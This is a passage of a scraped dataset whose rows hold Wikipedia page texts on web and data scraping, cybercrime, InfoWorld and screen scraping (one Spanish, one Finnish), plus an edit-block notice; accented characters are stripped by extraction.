(CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
610 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=1 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
611 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybercrime | Cybercrime encompasses a wide range of criminal activities that are carried out using digital devices and or networks. These crimes involve the use of technology to commit fraud, identity theft, data breaches, computer viruses, scams, and expanded upon in other malicious acts. Cybercriminals exploit vulnerabilities in computer systems and networks to gain unauthorized access, steal sensitive information, disrupt services, and cause financial or reputational harm to individuals, organizations, and governments. 1 In 2000, the tenth United Nations Congress on the Prevention of Crime and the Treatment of Offenders placed cyber crimes into five categories: unauthorized access, damage to computer data or programs, sabotage to hinder the functioning of a computer system or network, unauthorized interception of data within a system or network, and computer espionage. 1 Internationally, both state and non-state actors engage in cybercrimes, including espionage, financial theft, and other cross-border crimes. Cybercrimes crossing international borders and involving the actions of at least one nation-state are sometimes referred to as cyberwarfare. Warren Buffett has said that cybercrime is the "number one problem with mankind" 2 and that it "poses real risks to humanity". 3 The World Economic Forum's (WEF) 2020 Global Risks Report confirmed that organized cybercrime groups are joining forces to commit criminal activities online, while estimating the likelihood of their detection and prosecution to be less than 1 percent in the US. 4 There are also many privacy concerns surrounding cybercrime when confidential information is intercepted or disclosed, legally or otherwise. The World Economic Forum’s 2023 Global Risks Report ranks cybercrime as one of the top 10 risks facing the world today and for the next 10 years. 5 If cybercrime were viewed as a nation state, cybercrime would count as the third largest economy in the world. 6 In numbers, cybercrime is predicted to cause over 9 trillion in damages worldwide in 2024. 6 Computer crime encompasses a broad range of activities, including computer fraud, financial crimes, scams, cybersex trafficking, and ad-fraud. 7 8 Computer fraud is the act of using a computer to take or alter electronic data, or to gain unlawful use of a computer or system. 9 Computer fraud that involves the use of the internet is also called internet fraud. The legal definition of computer fraud varies by jurisdiction, but typically involves accessing a computer without permission or authorization. Forms of computer fraud include hacking into computers to alter information, distributing malicious code such as computer worms or viruses, installing malware or spyware to steal data, phishing, and advance-fee scams. 10 Other forms of fraud may be committed using computer systems, including bank fraud, carding, identity theft, extortion, and theft of classified information. These types of crimes often result in the loss of personal or financial information. The term cyberterrorism refers to acts of terrorism committed through the use of cyberspace or computer resources. 11 Acts of disruption of computer networks and personal computers through viruses, worms, phishing, malicious software, hardware, or programming scripts can all be forms of cyberterrorism. 12 Government officials and information technology (IT) security specialists have documented a significant increase in network problems and server scams since early 2001. In the United States there is an increasing concern from agencies such as the Federal Bureau of Investigation (FBI) and the Central Intelligence Agency (CIA). 13 Cyberextortion occurs when a website, e-mail server, or computer system is subjected to or threatened with attacks by malicious hackers, often through denial-of-service attacks. Cyberextortionists demand money in return for promising to stop the attacks and provide "protection". According to the FBI, cyberextortionists are increasingly attacking corporate websites and networks, crippling their ability to operate, and demanding payments to restore their service. More than 20 cases are reported each month to the FBI, and many go unreported in order to keep the victim's name out of the public domain. Perpetrators often use a distributed denial-of-service attack. 14 However, other cyberextortion techniques exist, such as doxing and bug poaching. An example of cyberextortion was the Sony Hack of 2014. 15 Ransomware is a type of malware used in cyberextortion to restrict access to files, sometimes threatening permanent data erasure unless a ransom is paid. Ransomware is a global issue, with more than 300 million attacks worldwide in 2021. According to the 2022 Unit 42 Ransomware Threat Report, in 2021 the average ransom demand in cases handled by Norton climbed 144 percent to $2.2 million, and there was an 85 percent increase in the number of victims who had their personal information shown on dark web information dumps. 16 A loss of nearly $400 million in 2021 and 2022 is just one of the statistics showing the impact of ransomware attacks on everyday people. 17 Cybersex trafficking is the transportation of victims for such purposes as coerced prostitution or the live streaming of coerced sexual acts or rape on webcam. 18 19 20 21 Victims are abducted, threatened, or deceived and transferred to "cybersex dens". 22 23 24 The dens can be in any location where the cybersex traffickers have a computer, tablet, or phone with an internet connection. 20 Perpetrators use social media networks, video conferences, dating pages, online chat rooms, apps, dark web sites, 25 and other platforms. 26 They use online payment systems 25 27 28 and cryptocurrencies to hide their identities. 29 Millions of reports of cybersex incidents are sent to authorities annually. 30 New legislation and police procedures are needed to combat this type of cybercrime. 31 There are an estimated 6.3 million victims of cybersex trafficking, according to a recent report by the International Labour Organization. 32 This number includes about 1.7 million child victims. An example of cybersex trafficking is the 2018 2020 Nth room case in South Korea. 33 According to the U.S. Department of Defense, cyberspace has emerged as an arena for national-security threats through several recent events of geostrategic importance, including the attack on Estonia's infrastructure in 2007, allegedly by Russian hackers. In August 2008, Russia again allegedly conducted cyberattacks against Georgia. Fearing that such attacks may become a normal part of future warfare among nation-states, military commanders see a need to develop cyberspace operations. 34 When an individual is the target of cybercrime, the computer is often the tool rather than the target. These crimes, which typically exploit human weaknesses, usually do not require much technical expertise. These are the types of crimes which have existed for centuries in the offline world. Criminals have simply been given a tool that increases their pool of potential victims and makes them all the harder to trace and apprehend. 35 Crimes that use computer networks or devices to advance other ends include: The unsolicited sending of bulk email for commercial purposes (spam) is unlawful in some jurisdictions. Phishing is mostly propagated via email. Phishing emails may contain links to other websites that are affected by malware. 36 Or they may contain links to fake online banking or other websites used to steal private account information. The content of websites and other electronic communications may be distasteful, obscene, or offensive for a variety of reasons. In some instances, it may be illegal. What content is unlawful varies greatly between countries, and even within nations. It is a sensitive area in which the courts can become involved in arbitrating between groups with strong beliefs. One area of internet pornography that has been the target of the strongest efforts at curtailment is child pornography, which is illegal in most jurisdictions in the world. citation needed Ad-frauds are particularly popular among cybercriminals, as such frauds are lucrative and unlikely to be prosecuted. 37 Jean-Loup Richet, a professor at the Sorbonne Business School, classified the large variety of ad-frauds committed by cybercriminals into three categories: identity fraud, attribution fraud, and ad-fraud services. 8 Identity fraud aims to impersonate real users and inflate audience numbers. The techniques used for identity fraud include traffic from bots (coming from a hosting company, a data center, or compromised devices); cookie stuffing; falsification of user characteristics, such as location and browser type; fake social traffic (misleading users on social networks into visiting the advertised website); and fake social media accounts that make a bot appear legitimate. Attribution fraud impersonates the activities of real users, such as clicks and conversations. Many ad-fraud techniques belong to this category: the use of hijacked and malware-infected devices as part of a botnet; click farms (companies where low-wage employees are paid to click or engage in conversations); incentivized browsing; video placement abuse (delivered in display banner slots); hidden ads (which will never be viewed by real users); domain spoofing (ads served on a fake website); and clickjacking, in which the user is forced to click on an ad. Ad-fraud services include all online infrastructure and hosting services that might be needed to undertake identity or attribution fraud. Services can involve the creation of spam websites (fake networks of websites that provide artificial backlinks); link building services; hosting services; or fake and scam pages impersonating a famous brand. Whereas content may be offensive in a non-specific way, harassment directs obscenities and derogatory comments at specific individuals, often focusing on gender, race, religion, nationality, or sexual orientation. Committing a crime using a computer can lead to an enhanced sentence. For example, in the case of United States v. Neil Scott Kramer, the defendant was given an enhanced sentence according to the U.S. Sentencing Guidelines Manual 2G1.3(b)(3) for his use of a cell phone to "persuade, induce, entice, coerce, or facilitate the travel of, the minor to engage in prohibited sexual conduct. Kramer appealed the sentence on the grounds that there was insufficient evidence to convict him under this statute because his charge included persuading through a computer device and his cellular phone technically is not a computer. Although Kramer tried to argue this point, the U.S. Sentencing Guidelines Manual states that the term "computer" means "an electronic, magnetic, optical, electrochemical, or other high-speed data processing device performing logical, arithmetic, or storage functions, and includes any data storage facility or communications facility directly related to or operating in conjunction with such device. In the United States, at least 41 states have passed laws and regulations that regard extreme online harassment as a criminal act. These acts can also be prosecuted on the federal level, because of US Code 18 Section 2261A, which states that using computers to threaten or harass can lead to a sentence of up to 20 years. 38 Several countries besides the US have also created laws to combat online harassment. In China, a country with over 20 percent of the world's internet users, in response to the Human Flesh Search Engine bullying incident, the Legislative Affairs Office of the State Council passed a strict law against cyberbullying. 39 40 The United Kingdom passed the Malicious Communications Act, which states that sending messages or letters electronically that the government deems "indecent or grossly offensive" and or language intended to cause "distress and anxiety" can lead to a prison sentence of six months and a potentially large fine. 41 42 Australia, while not directly addressing the issue of harassment, includes most forms of online harassment under the Criminal Code Act of 1995. Using telecommunication to send threats, harass, or cause offense is a direct violation of this act. 43 Although freedom of speech is protected by law in most democratic societies, it does not include all types of speech. Spoken or written threats can be criminalized because they harm or intimidate. This applies to online or network-related threats. Cyberbullying has increased drastically with the growing popularity of online social networking. As of January 2020, 44 percent of adult internet users in the United States had "personally experienced online harassment". 44 Online harassment of children often has negative and even life-threatening effects. According to a 2021 survey, 41 percent of children develop social anxiety, 37 percent develop depression, and 26 percent have suicidal thoughts. 45 The United Arab Emirates was found to have purchased the NSO Group's mobile spyware Pegasus for mass surveillance and a campaign of harassment of prominent activists and journalists, including Ahmed Mansoor, Princess Latifa, Princess Haya, and others. Ghada Owais was one of the many high-profile female journalists and activists who were targeted. She filed a lawsuit against UAE ruler Mohamed bin Zayed Al Nahyan along with other defendants, accusing them of sharing her photos online. 46 Darknet markets are used to buy and sell recreational drugs online. Some drug traffickers use encrypted messaging tools to communicate with drug mules or potential customers. The dark web site Silk Road, which started operations in 2011, was the first major online marketplace for drugs. It was permanently shut down in October 2013 by the FBI and Europol. After Silk Road 2.0 went down, Silk Road 3 Reloaded emerged. However, it was just an older marketplace named Diabolus Market that used the Silk Road name in order to get more exposure from the Silk Road brand's earlier success. 47 Darknet markets have had a rise in traffic in recent years for many reasons, such as the anonymous purchases and often a system of reviews by other buyers. 48 There are many ways in which darknet markets can financially drain individuals. Vendors and customers alike go to great lengths to keep their identities a secret while online. Commonly used tools for hiding their online presence include virtual private networks (VPNs), Tails, and the Tor Browser. Darknet markets entice customers by making them feel comfortable. Although people can easily gain access to a Tor browser, actually gaining access to an illicit market is not as simple as typing it in on a search engine, as one would with Google. Darknet markets have special links that change frequently, ending in .onion as opposed to the typical .com, .net, and .org domain extensions. To add to privacy, the most prevalent currency on these markets is Bitcoin, which allows transactions to be anonymous. 49 A problem that marketplace users sometimes face is exit scamming. 50 That is, a vendor with a high rating acts as if they are selling on the market and have users pay for products they never receive. 51 The vendor then closes their account after receiving money from multiple buyers and never sending what was paid for. The vendors, all of whom are involved in illegal activities, have no reason not to engage in exit scamming when they no longer want to be a vendor. In 2019, an entire market known as Wall Street Market allegedly exit scammed, stealing $30 million dollars in bitcoin. 52 The FBI has cracked down on these markets. In July 2017, the FBI seized one of the biggest markets, commonly called Alphabay, which re-opened in August 2021 under the control of DeSnake, one of the original administrators. 53 54 Investigators pose as buyers and order products from darknet vendors in the hope that the vendors leave a trail the investigators can follow. In one case an investigator posed as a firearms seller, and for six months people purchased from them and provided home addresses. 55 The FBI was able to make over a dozen arrests during this six-month investigation. 55 Another crackdown targeted vendors selling fentanyl and opiates. With thousands of people dying each year due to drug overdose, investigators have made internet drug sales a priority. 56 Many vendors do not realize the extra criminal charges that go along with selling drugs online, such as money laundering and illegal use of the mail. 57 In 2019, a vendor was sentenced to 10 years in prison after selling cocaine and methamphetamine under the name JetSetLife. 58 But despite the large amount of time investigators spend tracking down people, in 2018 only 65 suspects who bought and sold illegal goods on some of the biggest markets were identified. 59 Meanwhile, thousands of transactions take place daily on these markets. Due to cybercriminals using the internet for cross-border attacks and crimes, the process of prosecuting cybercriminals has been difficult. The number of vulnerabilities that a cybercriminal has an opportunity has to exploit has also increased over the years. From 2008 to 2014 alone, there has been a 17.75% increase in vulnerabilities across all online devices. 77 The internet's expansive reach causes the damage inflicted to people to be magnified since many methods of cybercrime have the opportunity to reach many people. The availability of virtual spaces 78 has allowed cybercrime to become an everyday occurrence. 79 In 2018, the Internet Crime Complaint Center received 351,937 complaints of cybercrime, which led to $2.7 billion lost. 80 In a criminal investigation, a computer can be a source of evidence (see digital forensics). Even when a computer is not directly used for criminal purposes, it may contain records of value to criminal investigators in the form of a logfile. In many countries, 81 Internet Service Providers are required by law to keep their logfiles for a predetermined amount of time. There are many ways for cybercrime to take place, and investigations tend to start with an IP Address trace; however, that does not necessarily enable detectives to solve a case. Different types of high-tech crime may also include elements of low-tech crime, and vice versa, making cybercrime investigators an indispensable part of modern law enforcement. Methods of cybercrime detective work are dynamic and constantly improving, whether in closed police units or in the framework of international cooperation. 82 In the United States, the FBI 83 and the Department of Homeland Security (DHS) 84 are government agencies that combat cybercrime. The FBI has trained agents and analysts in cybercrime placed in their field offices and headquarters. 83 In the DHS, the Secret Service has a Cyber Intelligence Section that works to target financial cybercrimes. They combat international cybercrime and work to protect institutions such as banks from intrusions and information breaches. Based in Alabama, the Secret Service and the Alabama Office of Prosecution Services work together to train professionals in law enforcement at the National Computer Forensic Institute. 84 85 86 The NCFI provides "state and local members of the law enforcement community with training in cyber incident response, investigation, and forensic examination in cyber incident response, investigation, and forensic examination. 86 Investigating cyber crime within the United States and globally often requires partnerships. Within the United States, cyber crime may be investigated by law enforcement, the Department of Homeland Security, among other federal agencies. However, as the world becomes more dependent on technology, cyber attacks and cyber crime are going to expand as threat actors will continue to exploit weaknesses in protection and existing vulnerabilities to achieve their end goals, often being data theft or exfiltration. To combat cybercrime, the United States Secret Service maintains an Electronic Crimes Task Force which extends beyond the United States as it helps to locate threat actors that are located globally and performing cyber related crimes within the United States. The Secret Service is also responsible for the National Computer Forensic Institute which allows law enforcement and people of the court to receive cyber training and information on how to combat cyber crime. The United States Immigration and Customs Enforcement is responsible for the Cyber Crimes Center (C3) providing cyber crime related services for federal, state, local and international agencies. Finally, the United States also has resources relating to Law Enforcement Cyber Incident Reporting to allow local and state agencies to understand how, when, and what should be reported as a cyber incident to the federal government. 87 Because cybercriminals commonly use encryption and other techniques to hide their identity and location, it can be difficult to trace a perpetrator after a crime is committed, so prevention measures are crucial. 79 88 The Department of Homeland Security also instituted the Continuous Diagnostics and Mitigation (CDM) Program. 89 The CDM Program monitors and secures government networks by tracking network risks and informing system personnel so that they can take action. In an attempt to catch intrusions before the damage is done, the DHS created the Enhanced Cybersecurity Services (ECS). 90 The Cyber Security and Infrastructure Security Agency approves the private partners that provide intrusion detection and prevention services through the ECS. 90 91 Cybersecurity professionals have been skeptical of prevention-focused strategies. 92 The mode of use of cybersecurity products has also been called into question. Shuman Ghosemajumder has argued that individual companies using a combination of products for security is not a scalable approach and has advocated for the use of cybersecurity technology primarily at the platform level. 93 On a personal level, there are some strategies available to defend against cybercrime: 94 Because of weak laws, cybercriminals operating from developing countries can often evade detection and prosecution. In countries such as the Philippines, laws against cybercrime are weak or sometimes nonexistent. Cybercriminals can then strike from across international borders and remain undetected. Even when identified, these criminals can typically avoid being extradited to a country such as the US that has laws that allow for prosecution. For this reason, agencies such as the FBI have used deception and subterfuge to catch criminals. For example, two Russian hackers had been evading the FBI for some time. The FBI set up a fake computing company based in Seattle, Washington. They proceeded to lure the two Russian men into the United States by offering them work with this company. Upon completion of the interview, the suspects were arrested. Clever tricks like that are sometimes a necessary part of catching cybercriminals when weak laws and limited international cooperation make it impossible otherwise. 95 The first cyber related law in the United States was the Privacy Act of 1974 which was only required for federal agencies to follow to ensure privacy and protection of personally identifiable information (PII). However, since 1974, in the United States other laws and regulations have been drafted and implemented, but there is still a gap in responding to current cyber related crime. The most recent cyber related law, according to NIST, was the NIST Small Business Cybersecurity Act, which came out in 2018, and provides guidelines to small businesses to ensure that cybersecurity risks are being identified and addressed accurately. 96 During President Barack Obama's presidency three cybersecurity related bills were signed into order in December 2014. The first was the Federal Information Security Modernization Act of 2014, the second was the National Cybersecurity Protection Act of 2014, and the third was the Cybersecurity Enhancement Act of 2014. Although the Federal Information Security Modernization Act of 2014 was just an update of an older version of the act, it focused on the practices federal agencies were to abide by relating to cybersecurity. While the National Cybersecurity Protection Act of 2014 was aimed toward increasing the amount of information sharing that occurs across the federal and private sector to improve cybersecurity amongst the industries. Finally, the Cybersecurity Enhancement Act of 2014 relates to cybersecurity research and education. 97 In April 2015, then-President Barack Obama released an executive order that allows the US to freeze the assets of convicted cybercriminals and block their economic activity within the United States. 98 The European Union adopted cybercrime directive 2013 40 EU, which was elaborated upon in the Council of Europe's Convention on Cybercrime. 99 It is not only the US and the European Union that have been introducing measures against cybercrime. On 31 May 2017, China announced that its new cybersecurity law was taking effect. 100 In Australia, legislation to combat cybercrime includes the Criminal Code Act 1995, the Telecommunications Act 1997, and the Enhancing Online Safety Act 2015. Penalties for computer-related crimes in New York State can range from a fine and a short period of jail time for a Class A misdemeanor, such as unauthorized use of a computer, up to 3 to 15 years in prison for a Class C felony, such as computer tampering in the first degree. 101 However, some former cybercriminals have been hired as information security experts by private companies due to their inside knowledge of computer crime, a phenomenon which theoretically could create perverse incentives. A possible counter to this is for courts to ban convicted hackers from using the internet or computers, even after they have been released from prison though as computers and the internet become more and more central to everyday life, this type of punishment becomes more and more draconian. Nuanced approaches have been developed that manage cyber offenders' behavior without resorting to total computer or internet bans. 102 These approaches involve restricting individuals to specific devices which are subject to monitoring or searches by probation or parole officers. 103 Cybercrime is becoming more of a threat in our society. According to Accenture's State of Cybersecurity, security attacks increased 31% from 2020 to 2021. The number of attacks per company increased from 206 to 270. Due to this rising threat, the importance of raising awareness about measures to protect information and the tactics criminals use to steal that information is paramount. However, despite cybercrime becoming a mounting problem, many people are not aware of the severity of this problem. This could be attributed to a lack of experience and knowledge of technological issues. There are 1.5 million cyber-attacks annually, which means that there are over 4,000 attacks a day, 170 attacks every hour, or nearly three attacks every minute, with studies showing that only 16 percent of victims had asked the people who were carrying out the attacks to stop. 104 Comparitech's 2023 study shows that cybercrime victims have peaked to 71 million annually, which means there is a cyberattack every 39 seconds. 105 Anybody who uses the internet for any reason can be a victim, which is why it is important to be aware of how to be protected while online. As cybercrime proliferated, a professional ecosystem evolved to support individuals and groups seeking to profit from cybercrime activities. The ecosystem has become quite specialized, and includes malware developers, botnet operators, professional cybercrime groups, groups specializing in the sale of stolen content, and so forth. A few of the leading cybersecurity companies have the skills and resources to follow the activities of these individuals and groups. 106 A wide variety of information that can be used for defensive purposes is available from these sources, for example, technical indicators such as hashes of infected files 107 and malicious IPs URLs, 107 as well as strategic information profiling the goals and techniques of the profiled groups. Much of it is freely available, but consistent, ongoing access typically requires a subscription. Some in the corporate sector see a crucial role for artificial intelligence in the future development of cybersecurity. 108 109 Interpol's Cyber Fusion Center began a collaboration with key cybersecurity players to distribute information on the latest online scams, cyber threats, and risks to internet users. Since 2017, reports on social engineering frauds, ransomware, phishing, and other attacks have been distributed to security agencies in over 150 countries. 110 The increasing prevalence of cybercrime has resulted in more attention to computer crime detection and prosecution. Hacking has become less complex as hacking communities disseminate their knowledge through the internet. citation needed Blogs and social networks have contributed substantially to information sharing, so that beginners can benefit from older hackers' knowledge and advice. Furthermore, hacking is cheaper than ever. Before the cloud computing era, in order to spam or scam, one needed a variety of resources, such as a dedicated server; skills in server management, network configuration, and network maintenance; and knowledge of internet service provider standards. By comparison, a software-as-a-service for mail is a scalable and inexpensive bulk e-mail-sending service for marketing purposes that could be easily set up for spam. 111 Cloud computing could help cybercriminals leverage their attacks, whether brute-forcing a password, improving the reach of a botnet, or facilitating a spamming campaign. 112 Cyber Crime. (n.d.). Folder . Federal Bureau of Investigation. Retrieved April 24, 2024, from https: www.fbi.gov investigate cyber Herrero, J., Torres, A., Vivas, P., Urue a, A. (2022). Smartphone Addiction, Social Support, and Cybercrime Victimization: A Discrete Survival and Growth Mixture Model: Psychosocial Intervention. Psychosocial Intervention, 31(1), 59 66. https: doi.org 10.5093 pi2022a3 |
612 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/InfoWorld | InfoWorld (IW) is an American information technology media business. Founded in 1978, it began as a monthly magazine. In 2007, it transitioned to a web-only publication. Its parent company today is International Data Group, 2 and its sister publications include Macworld and PC World. InfoWorld is based in San Francisco, with contributors and supporting staff based across the U.S.. 3 Since its founding, InfoWorld's readership has largely consisted of IT and business professionals. InfoWorld focuses on how-to, analysis, and editorial content from a mixture of experienced technology journalists and working technology practitioners. The site averages 4.6 million monthly page views and 1.1 million monthly unique visitors. 4 The magazine was founded by Jim Warren in 1978 as The Intelligent Machines Journal (IMJ). 5 It was sold to IDG in late 1979. On 18 February 1980, the magazine name was changed to InfoWorld. 1 In 1986, the Robert X. Cringely column began; for many, that pseudonymous column was the face of InfoWorld and its close ties to Silicon Valley in particular. 1 6 7 Up to and including the 15 June 1987 issue 24, volume 9, InfoWorld was published by Popular Computing, Inc., a subsidiary of CW Communications, Inc. Since then it has been published by InfoWorld Publishing, Inc., a subsidiary of IDG Communications, Inc. Ethernet inventor Bob Metcalfe was CEO and publisher from 1991 to 1996, and contributed a weekly column until 2000. 8 9 As the magazine transitioned to be exclusively Web-based, the final print edition was dated 2 April 2007 (Volume 29, Issue 14, Number 1384). 1 In its web incarnation, InfoWorld has transitioned away from widely available news stories to a focus on how-to, expert testing, and thought leadership. 10 |
613 | https://en.wikipedia.org/wiki/Data_scraping | https://es.wikipedia.org/wiki/Screen_scraping | Screen scraping es el nombre en ingl s de una t cnica de programaci n que consiste en tomar una presentaci n de una informaci n (normalmente texto, aunque puede incluir informaci n gr fica) para, mediante ingenier a inversa, extraer los datos que dieron lugar a esa presentaci n. Por ejemplo: En general, hay que destacar que los sistemas de los que se extrae la informaci n no est n dise ados para extraer dicha informaci n (en algunos casos, es al contrario, como en los sistemas de captcha). La traducci n aproximada de screen scraping es raspado de pantalla. |
614 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-5 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
615 | https://en.wikipedia.org/wiki/Data_scraping | https://fi.wikipedia.org/wiki/Tiedonharavointi | Tiedonharavointi 1 2 (my s "web-kaavinta", "verkkosivujen haravointi", engl. scraping, web harvesting, web data extraction) tarkoittaa ihmisen luettavaksi muotoillun tiedon automaattista kokoamista aineistosta, erityisesti verkkosivuilta. Sivuilta voi hakea jotain tekstimuotoista dataa, tai kuvia tai videoita. Edelleen web-haravoijaa voi kiinnostaa esimerkiksi tuotetiedot kuten tuotteiden hinta eri verkkosivuilla, asiakkaiden palaute, sosiaalisen median postaukset. Informaatio ker t n esimerkiksi ohjelmassa k sitelt v ksi, tietokantaan tai laskentataulukkoon. Tietojen keruun voi tehd k sin, mutta tyypillisesti k ytet n automaattisia ty kaluja, jotka erottavat halutun tiedon. Ohjelmalle voi antaa URL-osoitteita joista ladataan verkkosivun HTML-tiedosto. Kehittyneemm t kaapijat osaavat ladata koko webbisivun CSS-tyylisivuja ja JavaScripti my ten. Haravoija etsii sivulta kaiken k ytt kelpoisen tiedon, tai jonkin tiedon jonka k ytt j on m ritellyt ennen ajoa ja muuntaa sen k ytt j lle hy dylliseen muotoon, esimerkiksi CSV, Excel-tiedostoksi tai jopa JSONiksi, jota voidaan k sitell edelleen. Tiedonharavointi voidaan tehd k sin copy-paste-menetelm ll (tai tallentamalla tiedostoja). K ytt j voi ohjelmoida oman skriptin, joka etsii tietoa esim. s nn llisten lausekkeiden avulla, j sent m ll ja k ym ll l pi dokumentin DOM-mallin, etsim ll metadataa tai jopa koneoppimisen ja konen n avulla. Tarkoitusta varten on my s valmiita, kustomoitavia ohjelmia ja selainlaajennoksia. 